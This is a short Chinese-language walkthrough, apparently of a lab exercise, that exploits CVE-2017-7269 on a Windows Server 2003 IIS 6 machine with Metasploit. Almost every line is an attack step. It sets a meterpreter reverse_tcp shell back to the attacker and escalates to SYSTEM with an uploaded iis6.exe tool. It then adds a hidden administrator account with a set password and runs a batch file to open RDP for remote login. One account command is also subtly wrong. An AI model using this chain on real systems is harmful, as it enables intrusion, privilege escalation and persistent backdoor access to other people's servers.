一.实验环境搭建
1.目标机:windows server 2003 r2
2.iis配置
目标机ip:192.168.1.175
二.攻击机器
一台kai liunx
ip:192.168.1.144
三.开始攻击了
exp:https://github.com/zcgonvh/cve-2017-7269
1.把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
2.打开神器Metasploit
3.输入use命令,use exploit/windows/iis/cve-2017-7269
4.使用命令show options
5.设置目标机ip,set RHOST 192.168.1.175
6.设置对面网站,set HttpHost 192.168.1.175
7.设置返回载荷,set payload windows/meterpreter/reverse_tcp
8.设置攻击机ip,set LHOST 192.168.1.144
9.进行溢出,exploit
10.如果出现错误Exploit completed, but no session was created,有可能是攻击的过多,可以尝试重启,实在不行就恢复快照
11.输入shell命令,来到了我们所熟悉的界面
12.查看当前用户权限,whoami,发现只是个一般用户权限
13.cd到网站目录,命令:c:\Inetpub\wwwroot,但是小编这里是没有权限进行创建文件,文件夹等操作的
14.来到c盘根目录,cd c:\,进行新建文件夹,发现创建成功(实际情况中就只有一个文件夹一个文件夹的寻找了)
14.按Ctrl + C退出shell,输出y
15.利用Metasploit的上传功能,把提权工具iis6.exe上传到刚刚新建的文件里(提权工具有很多,iis6.exe,pr.exe等等)
16.又回到shell里面确定工具上传是否成功
17.利用工具进行提权,命令:iis6.exe "whoami",已经是system权限了
18.进行新建用户,iis6.exe "net user DarkHQ !@#qwe123 /add"
19.添加用户到管理员,iis6.exe "net localhost administrators DarkHQ /add"
20.查看远程连接是否打开,没有打开,命令:netstat -an
21.再上传一个开3389.bat,利用iis6.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面iis6.exe上传方法一样)
命令:iis6.exe "3389.bat"
22.查看是否打开,netstat -an,已经成功打开
23.进行远程连接,本地cmd输入命令:mstsc
24.利用之前新建的管理员成功登录
感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!